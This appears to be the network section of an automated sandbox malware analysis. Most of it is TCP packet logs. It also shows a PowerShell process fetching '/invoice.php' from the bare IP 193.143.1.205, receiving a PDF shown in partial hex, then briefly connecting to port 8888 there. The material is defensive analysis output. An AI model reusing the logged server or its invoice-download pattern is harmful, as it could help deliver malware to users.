                        Jan 15, 2025 08:13:09.457132101 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.457154036 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.457158089 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.457166910 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.457191944 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.457273960 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.457319021 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.457974911 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.457986116 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.457995892 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.458025932 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.458075047 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.458086014 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.458098888 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.458118916 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.458122969 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.458148003 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.458503008 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.458553076 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.458955050 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.458966017 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.458976030 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.459011078 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.459038973 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.459050894 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.459060907 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.459072113 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.459091902 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.459116936 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.459117889 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.459153891 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.459849119 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.459956884 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.460005999 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.460097075 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.460108995 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.460119009 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.460149050 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.460228920 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.460274935 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.460621119 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.460638046 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.460678101 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.460839033 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.460851908 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.460899115 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.461091042 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.461102009 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.461112022 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.461153030 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.461257935 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.461270094 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.461280107 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.461289883 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.461299896 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.461302042 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.461313963 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.461338043 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.462071896 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.462084055 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.462094069 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.462136030 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.462138891 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.462182045 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.462204933 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.462214947 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.462224960 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.462230921 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.462294102 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.462294102 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.463044882 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.463054895 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.463066101 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.463089943 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.463113070 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.463124037 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.463134050 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.463145018 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.463157892 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.463196039 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.463871956 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.463884115 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.463895082 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.463912010 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.463938951 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.464236021 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.464246988 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.464257956 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.464299917 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.464325905 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.464337111 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.464346886 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.464359045 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.464370012 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.464390993 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.464497089 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.464531898 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.465199947 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.465209961 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.465220928 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.465245962 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.465353966 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.465396881 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.465643883 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.465683937 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.465694904 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.465734005 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.465770006 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.465780973 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.465790987 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.465804100 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.465812922 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.465832949 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.465873957 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.465924025 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.466702938 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.466713905 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.466725111 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.466736078 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.466756105 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.466773033 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.466774940 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.466804028 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.466813087 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.466846943 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.466922998 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.466933012 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.466947079 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.466958046 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.466969967 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.466984034 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.467010975 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.467035055 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467046022 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467056990 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467067957 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467081070 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.467089891 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.467181921 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467197895 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467209101 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467217922 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.467220068 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467231035 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467242956 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467252016 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.467267036 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467272997 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.467278004 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467288971 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467325926 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.467339039 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.467437029 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467447996 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467458963 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467495918 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.467752934 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467807055 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.467838049 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467849016 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467859030 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467869997 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.467880964 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.467916965 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.467998028 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468008041 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468014002 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468064070 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.468084097 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468096018 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468106031 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468116999 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468130112 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.468138933 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.468241930 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468252897 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468262911 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468274117 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468286991 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468290091 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.468297958 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468310118 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.468321085 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.468363047 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468410015 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.468499899 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468511105 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468519926 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468537092 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468548059 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468552113 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.468559980 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468570948 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468575954 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.468581915 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468594074 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468605995 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.468641043 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.468961954 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468974113 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.468985081 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469002008 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.469034910 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.469063997 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469079971 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469095945 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469136000 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.469244957 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469255924 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469265938 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469270945 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469281912 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469288111 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469294071 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.469300032 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469322920 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.469360113 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.469402075 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469413042 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469424009 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469434023 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469445944 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469456911 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469464064 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.469470978 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.469496012 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.469535112 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469544888 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469552994 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.469603062 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.689378023 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689387083 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689399004 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689410925 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689456940 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689467907 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689542055 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689553022 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689562082 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689665079 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689670086 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.689676046 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689687014 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689701080 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689706087 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.689714909 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689724922 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689733982 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.689755917 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.689802885 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689811945 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689825058 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689846039 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.689857960 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.745219946 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.862174034 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:10.428462982 CET497058888192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:10.433420897 CET888849705193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:10.433515072 CET497058888192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:10.433887959 CET497058888192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:10.438781977 CET888849705193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:11.238305092 CET888849705193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:11.279119015 CET497058888192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:11.426358938 CET497058888192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:23.899570942 CET5637053192.168.2.51.1.1.1
                        Jan 15, 2025 08:13:23.904498100 CET53563701.1.1.1192.168.2.5
                        Jan 15, 2025 08:13:23.904575109 CET5637053192.168.2.51.1.1.1
                        Jan 15, 2025 08:13:23.909420967 CET53563701.1.1.1192.168.2.5
                        Jan 15, 2025 08:13:24.358515024 CET5637053192.168.2.51.1.1.1
                        Jan 15, 2025 08:13:24.363500118 CET53563701.1.1.1192.168.2.5
                        Jan 15, 2025 08:13:24.363574982 CET5637053192.168.2.51.1.1.1
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Jan 15, 2025 08:13:23.290910006 CET | 55363 | 53 | 192.168.2.5 | 1.1.1.1
                        Jan 15, 2025 08:13:23.899038076 CET | 53 | 62615 | 1.1.1.1 | 192.168.2.5
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Jan 15, 2025 08:13:23.290910006 CET | 192.168.2.5 | 1.1.1.1 | 0x9fc1 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Jan 15, 2025 08:13:21.177265882 CET | 1.1.1.1 | 192.168.2.5 | 0x33cc | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                        Jan 15, 2025 08:13:21.177265882 CET | 1.1.1.1 | 192.168.2.5 | 0x33cc | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                        Jan 15, 2025 08:13:23.298129082 CET | 1.1.1.1 | 192.168.2.5 | 0x9fc1 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
                        • 193.143.1.205
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49704 | 193.143.1.205 | 80 | 1868 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Jan 15, 2025 08:13:08.057343960 CET | 169 | OUT | GET /invoice.php HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                        Host: 193.143.1.205
                        Connection: Keep-Alive
                        Jan 15, 2025 08:13:08.891019106 CET | 1236 | IN | HTTP/1.1 200 OK
                        Server: nginx/1.22.1
                        Date: Wed, 15 Jan 2025 07:13:08 GMT
                        Content-Type: application/pdf
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Frame-Options: SAMEORIGIN
                        Data Raw: 31 66 36 61 0d 0a 25 50 44 46 2d 31 2e 37 0a 25 bf f7 a2 fe 0a 31 20 30 20 6f 62 6a 0a 3c 3c 20 2f 50 61 67 65 73 20 33 20 30 20 52 20 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 20 2f 54 79 70 65 20 2f 4f 62 6a 53 74 6d 20 2f 4c 65 6e 67 74 68 20 35 36 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4e 20 31 20 2f 46 69 72 73 74 20 34 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 56 30 e0 b2 b1 51 d0 77 ce 2f cd 2b 51 30 54 d0 f7 ce 4c 29 56 88 56 30 51 30 50 08 52 88 55 d0 0f a9 2c 48 55 d0 0f 48 4c 4f 2d 56 b0 b3 e3 02 00 25 30 0c 6d 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 20 2f 43 6f 6e 74 65 6e 74 73 20 35 20 30 20 52 20 2f 47 72 6f 75 70 20 3c 3c 20 2f 43 53 20 2f 44 65 76 69 63 65 52 47 42 20 2f 49 20 74 72 75 65 20 2f 53 20 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 20 2f 54 79 70 65 20 2f 47 72 6f 75 70 20 3e 3e 20 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 35 39 34 2e 39 [TRUNCATED]
                        Data Ascii: 1f6a%PDF-1.7%1 0 obj<< /Pages 3 0 R /Type /Catalog >>endobj2 0 obj<< /Type /ObjStm /Length 56 /Filter /FlateDecode /N 1 /First 4 >>streamx3V0Qw/+Q0TL)VV0Q0PRU,HUHLO-V%0mendstreamendobj4 0 obj<< /Contents 5 0 R /Group << /CS /DeviceRGB /I true /S /Transparency /Type /Group >> /MediaBox [ 0 0 594.96 840.96 ] /Parent 3 0 R /Resources 6 0 R /StructParents 0 /Type /Page >>endobj5 0 obj<< /Filter /FlateDecode /Length 75 >>streamx3T0B]C aabgiUeE\ E&@yC:lBWB!P9D~K>W &endstreamendobj6 0 obj<< /ExtGState << /a0 << /CA 1 /ca 1 >> >> /XObject << /x7 7 0 R >> >>endobj7 0 obj<< /BBox [ 0 0 595 841 ] /Filter /FlateDecode /Resources 8 0 R /Subtype /Form /Type /XObject /Length 59 >>streamx+T(O/6PH/*244S0B]HOS04TpBendstreamendobj8 0 obj<< /ExtGState << /a0 << /CA 1 /ca 1 >> /gs0 << /BM /Normal /CA 1.0 /SMask /None /ca 1.0 >> >> /XObject << /x11 9 0 R >> >>endobj9 0 obj<< /BitsPerComponen [TRUNCATED]
                        Jan 15, 2025 08:13:08.891033888 CET | 224 | IN | Data Raw: 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 48 65 69 67 68 74 20 33 35 30 34 20 2f 49 6e 74 65 72 70 6f 6c 61 74 65 20 74 72 75 65 20 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 2f 57 69 64 74 68
                        Data Ascii: /FlateDecode /Height 3504 /Interpolate true /Subtype /Image /Type /XObject /Width 2479 /Length 634286 >>streamxs-oYfQf|H *Q$oeVUC;"/
                        Jan 15, 2025 08:13:08.891043901 CET | 1236 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Data Ascii:
                        Jan 15, 2025 08:13:08.891056061 CET | 1236 | IN | Data Raw: 3b 85 a9 6f 3f 00 00 00 00 00 00 00 00 00 1b 34 75 8a c1 d4 ca 25 f4 d1 96 d0 79 06 bd 9d 3d 6e a2 c7 a0 8a ce 93 68 1a 11 a5 87 ee 9e a9 6f 42 00 00 00 00 00 00 00 00 00 1b 31 75 84 c1 d4 6a 4a 68 1a ed 74 19 f4 f1 66 f6 b8 8e 1e 37 8f a9 8a 56
                        Data Ascii: ;o?4u%y=nhoB1ujJhtf7VOY;oE7uGv+j Tg*~*:{oEk6u~%f vA.q<pDtCtC'0`&K]%3h}
                        Jan 15, 2025 08:13:08.891067028 CET | 448 | IN | Data Raw: 14 ec a4 70 2c f4 e3 60 47 ae 3e 30 74 b0 23 f7 a4 d9 91 db 8d 85 7e 68 c7 42 df 76 db 71 df bc ba 78 fd f2 e2 f5 8b 8b 57 2f 9a ff 6c 7a e8 cb ae 87 a6 65 b9 fa e4 50 bb 29 f7 e6 69 b0 29 f7 b1 1b 0e 25 86 4e 6a ea 9b 13 00 00 c0 34 f8 62 09 00
